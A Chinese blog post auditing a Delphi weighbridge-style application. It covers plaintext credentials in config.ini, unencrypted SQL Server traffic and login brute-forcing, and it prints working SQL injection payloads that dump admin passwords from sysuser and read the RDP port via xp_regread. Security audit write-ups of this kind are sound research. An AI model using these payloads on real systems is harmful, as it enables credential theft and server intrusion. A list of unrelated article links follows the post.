程序的主要function,与 procedure注:Delphi把操作数据的方法分成了两种,一种是function,另一种是procedure,大致理解为“函数”和“过程”。Procedure类似C语言中的无返回值函数,即VOID。而Function就是c语言中的有返回值函数,即没有Void。

程序分为2种连接数据库模式:

程序分为2种连接数据库模式:

无论是本地模式,还是联网模式,都是读取,当前路径的config.ini配置文件:(导致敏感信息暴漏,可直连服务器)

继续跟数据库连接:配合SQL Server数据库,直接带入,可以判断出为明文存储。

config.ini配置如下:

基于TCP通信,SQL Server通信构架大致如下:

(可导致通信过程中抓取明文执行)

代入执行:

(导致可拼接sql语句,查询任意语句或者执行命令)

部分语句其中如下:

select distinct memberid,receivecompany from weigh where receivecompany is notnull  and receivecompany like  ''%'+xxxxxx+'%''

软件呈现如下:

对应 收货单位编号,以及收货单位名称。

分别为:memberid,receivecompany闭合语句为:

2' ; select loginid as memberid  , password as receivecompany from sysuser --

抓取返回如图:

得到admin 账号以及密码。构造读取远程桌面端口号:

构造读取远程桌面端口号:

得到远程服务器端口号

2';EXECmaster..xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp','PortNumber' --

copy 获取缓冲区内容:

(导致可从服务器端构造代码)

copy 用法如下:

copy(a,b,c);

a:就是copy源,就是一个字符串,表示你将要从a里copy一些东西,b:从a中的第b位开始copy(包含第11位),

c:copy从第b位开始后的c个字符,

exp: m:=‘the test fuck'

s:=copy(m,2,2);      //s值为‘he’

当超出范围,会发生异常错误。实例中,从服务器数据库获取数据后进行copy。

软件登陆部分代码如下:

(导致可自动化跑 loginid。)

多次尝试错误处理如下:退出软件,并且重新开始计算。

文章来源:https://micropoor.blogspot.com/

delphi query 存储为dbf_Delphi 代码审计项目实战 1相关推荐

  1. delphi query 存储为dbf_在Delphi程序中维护DBF数据库

    下载本文示例代码 p> 由于Delphi开发的易用性和快速 性,很多原来使用Foxpro和VisualFoxpro编程的程序员转向了Delphi.但由于工作上或其它的原因,原来的应用系统尤其是应 ...

  2. 2022 最新 Android 基础教程,从开发入门到项目实战【b站动脑学院】学习笔记——第六章:数据存储

    第 6 章 数据存储 本章介绍Android 4种存储方式的用法,包括共享参数SharedPreferences.数据库SQLite.存储卡文 件.App的全局内存,另外介绍Android重要组件-应 ...

  3. PHP代码审计--百家CMS4.1.4项目实战(上)

    PHP代码审计--百家CMS4.1.4项目实战(上) 前提: 最近工作有点闲,就想着开始拓展技能了,学一下代码审计,入门就从php开始吧.这个百家CMS项目,我分为两部分测试,一.是渗透测试纯黑盒测试 ...

  4. 项目的数据存储c语言,C语言项目实战项目8__项目中学生数据的存储与重用.ppt

    C语言项目实战项目8__项目中学生数据的存储与重用 项目8 技能目标 能用fopen函数和fclose函数打开和关闭文件 能正确地读写文件 能用文件定位函数对文件进行正确的定位操作 能用格式化读写函数 ...

  5. 云平台项目实战(华为篇)之存储技术

        本次云平台项目采用的华为高端存储6800 V3 产品,具有高规格的硬件结构,块和文件一体化的软件架构,结合多种高级数据应用和数据保护技术,使存储系统具有高性能.高可扩展性.高可靠性和高可用性等 ...

  6. delphi 登录界面 主窗体 切换_Python GUI项目实战(二)主窗体的界面设计与实现

    前言 上一节我们介绍了Python GUI项目实战(一)登录窗体的设计与实现,实现了该项目登录窗体的GUI的搭建,用户的账号和密码校验完成后应当跳转到主窗体界面,这一节我们将具体介绍主窗体界面的设计与 ...

  7. PHP代码审计--百家CMS4.1.4项目实战(下)

    PHP代码审计--百家CMS4.1.4项目实战(下) 这是百家cms的第二部分-代码审计 关于百家cms的安装配置及黑盒测试,可以参考上一篇文章: PHP代码审计--百家CMS4.1.4项目实战(上) ...

  8. 知识图谱之《海贼王-ONEPICE》领域图谱项目实战(含码源):数据采集、知识存储、知识抽取、知识计算、知识应用、图谱可视化、问答系统(KBQA)等

    项目设计集合(人工智能方向):助力新人快速实战掌握技能.自主完成项目设计升级,提升自身的硬实力(不仅限NLP.知识图谱.计算机视觉等领域):汇总有意义的项目设计集合,助力新人快速实战掌握技能,助力用户 ...

  9. 【SpringBoot项目实战】图片压缩包上传、解压、存储等等一套流程教学

    [SpringBoot项目实战]图片压缩包上传.解压.存储等等一套流程教学 前言 一.压缩包上传 1.接口实现 2.获取压缩包的文件名和文件路径 二.压缩包解压并保存 1.处理压缩包文件方法 解压缩步 ...

最新文章

  1. 前端通信:ajax设计方案(十)--- 完善Promise A+规范,增加mock数据功能
  2. mysql常见死锁_MySQL死锁系列-常见加锁场景分析
  3. Android中ExpandableListView的使用
  4. 信息系统项目管理师-信息化与信息系统核心知识点思维脑图
  5. 俺是如何在3个月内写出博士论文的?
  6. 乾通嗖嗖抢先布局多元化用工 实现全流程数智化人力管理
  7. Python入门--闭包,工程函数
  8. linux中级之ansible配置(roles)
  9. mysql工具——mysqlcheck(MYISAM)
  10. 并发编程常见面试题总结五
  11. [转]软件安装管家软件安装目录
  12. vs安装以及简单使用教程
  13. Vue项目使用v-drag实现拖拽功能
  14. [篇二章六]_关于 Windows 11 处于通知状态
  15. 朱光潜给青年的十二封信 之 谈升学和选课
  16. OT安全|工业控制系统(ICS)六大安全实践
  17. 英特尔i5 1240H
  18. 可视计算机应用期末考试,职称计算机考试photoshop考试习题复习
  19. android 删除一个工程,Android Studio该怎样删除项目?
  20. python func函数用法_python函数局部变量用法实例分析

热门文章

  1. 为节省8亿做迁移,13亿记录出错赔偿29亿
  2. SQL执行效率提升几万倍的操作详解!
  3. 40张图+万字,从9个数据类型帮你稳稳的拿捏Redis数据结构
  4. 基于Tensorflow + Opencv 实现CNN自定义图像分类
  5. 史上最强DIY,手工制作一只会说话的机器狗
  6. 容易造成单片机内存溢出的几个陷阱
  7. 深入比特币原理(一)——比特币白皮书总结与点评
  8. Cloud Native Weekly|2019欧洲KubeCon成功闭幕
  9. 微型计算机出版时间,《微型计算机技术》低价购书_陈慈发 主编_计算机与互联网_孔网...
  10. 气动调节阀基本结构图